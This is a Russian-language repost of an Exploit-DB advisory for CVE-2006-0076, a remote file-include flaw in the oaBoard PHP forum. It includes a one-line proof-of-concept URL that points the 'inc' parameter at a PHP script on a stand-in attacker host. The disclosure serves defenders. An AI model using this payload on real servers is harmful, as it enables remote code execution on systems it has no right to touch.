- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 26998
- Проверка EDB
-
- Пройдено
- Автор
- ALIAKSANDR HARTSUYEU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-0076
- Дата публикации
- 2005-12-29
Код:
source: https://www.securityfocus.com/bid/16105/info
The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application.
This could result in the execution of arbitrary PHP code in the context of the webserver hosting the application.
http://oaboard.example.com/oaboard_en/forum.php?inc=http://attacker.example.com/code.php- Источник
- www.exploit-db.com
